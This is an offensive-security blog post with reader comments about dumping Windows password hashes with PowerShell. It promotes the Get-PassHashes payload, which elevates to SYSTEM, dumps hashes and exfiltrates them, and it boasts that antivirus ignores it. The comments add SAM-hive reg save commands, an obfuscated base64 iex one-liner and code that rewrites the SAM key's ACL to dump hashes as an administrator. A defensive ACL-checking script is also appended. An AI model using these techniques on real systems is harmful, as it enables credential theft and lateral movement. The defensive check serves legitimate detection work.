Wednesday, May 29, 2013

Poshing the hashes part 2 - Dump Windows password hashes with PowerShell


UPDATE: As mentioned here, even after KB2871997, you could still 'Posh' the SID-500-Administrator's hashes.

OK, this should have been the first part. Read my previous post, Poshing the hashes: Using PowerShell to play with hashes, about what we can do _after_ dumping password hashes. I got many questions on how to dump hashes using PowerShell before using them. So here is a quick post about dumping password hashes using PowerShell:

There is a PowerShell script available in the Metasploit Framework called powerdump which can be used to dump hashes from a Windows machine using PowerShell. It is written by David Kennedy. Let's see it in action.



What just happened? We need SYSTEM privs to use powerdump on a Windows 7 system; even an elevated Administrator privilege is not sufficient.

UPDATE (29/06/2014): Get-PassHashes does not require SYSTEM privs anymore for dumping hashes.
(The code posted by SuperGQ in the comments has been used with modifications to achieve this.)

Once we have admin, there are a number of ways to get SYSTEM privileges. My favorite is PowerShell. The Enable-DuplicateToken script in Nishang, written by Niklas Goude, can be used: it lets us use the SYSTEM token from the lsass process in the current PowerShell thread. So, if we run Enable-DuplicateToken and then call powerdump from the same thread, we can dump password hashes from a Windows 7 machine without using any "third party" tool.

I have combined the scripts and created a payload for Nishang, Get-PassHashes.


Get-PassHashes elevates itself to SYSTEM (it needs Admin privs) and dumps password hashes. It is capable of exfiltrating the hashes to pastebin/gmail/tinypaste. This "exfiltration" thing has been improved in Nishang and will be included with many payloads very soon. For now, let's see Get-PassHashes in action.

Nice! We have the hashes. Now, as per my other post, we can use these hashes with Windows Credential Editor and have much more fun with the target and other Windows systems in the network.


As with almost every other payload/script in powershell, no AV etc. is bothered with this whole thing.

Get-PassHashes can be obtained from the Nishang repository. Please check out the repository. Existing users, please update your repos.

UPDATE:

Did Microsoft break Poshing the hashes with KB2871997 and KB2928120? This blog post disagrees:
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html

Hope you enjoyed this. Share your thoughts in the comments below. As always, bug reports, feedback and feature requests are welcome.

12 comments:

  1. This comment has been removed by the author.

  2. So it's possible to dump hashes with SYSTEM privileges, but what for? It's possible to dump credentials from all enabled security providers with administrator privileges (you could get cleartext passwords of logged on users and hashes of all the other users)

    Replies
    1. Yeah, but I found this to be stealthier and easier than other methods known to me.

  3. No SYSTEM required. As Administrator:

    "reg save HKLM\SAM SAM.reg"

    "reg save HKLM\SYSTEM SYSTEM.reg"

    bkhive, samdump2, etc.

    Replies
    1. Thanks. Methods known to me which make use of powershell for dumping hashes require SYSTEM. I am talking about that in the post.

  4. Hello, I really enjoy your blog and thought I'd give back by providing a method to dump local password hashes using PowerShell, without SYSTEM.

    This script does require an elevated privileged command prompt.

    @powershell -ep bypass -c "iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('y0ytUNDwSy3X9U/KSk0uUfBLLdELT01yzslMzSvR1HPJL8/LyU9MCS4pysxL11DPKCkpsNLXT8os0cup1DdMKgt1DS5R1+TlAgA=')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

    Enjoy!

    Replies
    1. Thank you! But the Powerdump script, which is being downloaded in the command you gave, needs system to work on Windows 7.

    2. I modified the Powerdump script to only require Administrative access.

      Take a closer look... here's the relevant snippet. Tested as working (many times) on Win XP, 7, and 8.

      # Refuse to run unless the current user is an administrator.
      if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
      {
          Write-Warning "Script requires elevated or administrative privileges."
          Return
      } else {
          # Allow rule giving the current user FullControl, inherited by subkeys.
          $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
              [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
              "FullControl",
              [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
              [System.Security.AccessControl.PropagationFlags]"None",
              [System.Security.AccessControl.AccessControlType]"Allow")
          # Open SAM\SAM\Domains with the right to change its permissions.
          $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
              "SAM\SAM\Domains",
              [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
              [System.Security.AccessControl.RegistryRights]::ChangePermissions)
          # Add the rule to the key's ACL and write the ACL back.
          $acl = $key.GetAccessControl()
          $acl.SetAccessRule($rule)
          $key.SetAccessControl($acl)

          # DumpHashes is defined elsewhere in the Powerdump script.
          DumpHashes
      }

      Enjoy!

    3. SYSTEM was required because by default only SYSTEM has rights to the SAM\SAM\Domains hive. This modification grants the current user rights to this hive in an inherited manner and thus negates the need to be running as SYSTEM. As an additional improvement, I've considered removing said rights after dumping the hashes. Use SetACL Studio to view/confirm before and after permission changes.

      Delete
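A defender-side check for the permission change described in the comments above, added here as an example (it is not code from the post, the commenters or Nishang): it lists non-SYSTEM trustees that can read HKLM\SAM\SAM\Domains, which is what the modified script leaves behind if the rights are not removed. The function name, the expected-SID list and the assumption that an elevated session may read the key's DACL are mine; baseline a known-good host first.

```powershell
# Added example: flag non-SYSTEM trustees that can read HKLM\SAM\SAM\Domains.
# Assumption (taken from the comment above): on a clean host only SYSTEM can
# read this key, so any other allow ACE with read rights needs triage.
function Get-SamDomainsAclFinding {
    param(
        [string]$SubKey = 'SAM\SAM\Domains',
        [string[]]$ExpectedSids = @('S-1-5-18')   # NT AUTHORITY\SYSTEM
    )
    $rights = [System.Security.AccessControl.RegistryRights]
    # Bits needed to walk the key and read the values stored under it.
    $readMask = [int]($rights::QueryValues -bor $rights::EnumerateSubKeys)

    # ReadPermissions is all that is requested; nothing is modified.
    $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
        $SubKey,
        [Microsoft.Win32.RegistryKeyPermissionCheck]::Default,
        $rights::ReadPermissions)
    if ($null -eq $key) { throw "HKLM\$SubKey not found" }
    try {
        $acl = $key.GetAccessControl(
            [System.Security.AccessControl.AccessControlSections]::Access)
        $sidType = [System.Security.Principal.SecurityIdentifier]
        # Explicit and inherited ACEs, with trustees returned as SIDs.
        foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
            $sid = $ace.IdentityReference.Value
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ExpectedSids -contains $sid) { continue }
            if (([int]$ace.RegistryRights -band $readMask) -eq 0) { continue }
            $name = '<unresolved>'
            try {
                $name = $ace.IdentityReference.Translate(
                    [System.Security.Principal.NTAccount]).Value
            } catch { }   # SID of a deleted or foreign account: keep placeholder
            New-Object PSObject -Property @{
                Key       = "HKLM\$SubKey"
                Sid       = $sid
                Account   = $name
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
            }
        }
    } finally {
        $key.Close()
    }
}

# No rows means no unexpected reader; every row is a finding to investigate.
Get-SamDomainsAclFinding | Format-Table -AutoSize
```

An explicit (Inherited = False) FullControl entry for a user account matches the rule the modified Powerdump snippet adds.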
    4. Thank you, it works :)

      Would you like to contribute the changes to Nishang? It can certainly use a hashdump script of its own - credit will obviously go to you and Dave. Where can I drop you an email? or contact me on nikhil [dot] uitrgpv [at] gmail.com

    5. Am I doing something wrong? This script dumps hashes but they are incorrect on Win 2008 R2?

    6. I don't have access to a Server 2008. But checked in on a Server 2012 R2, it dumps the hashes correctly. You may be facing problems in "passing" the hash.
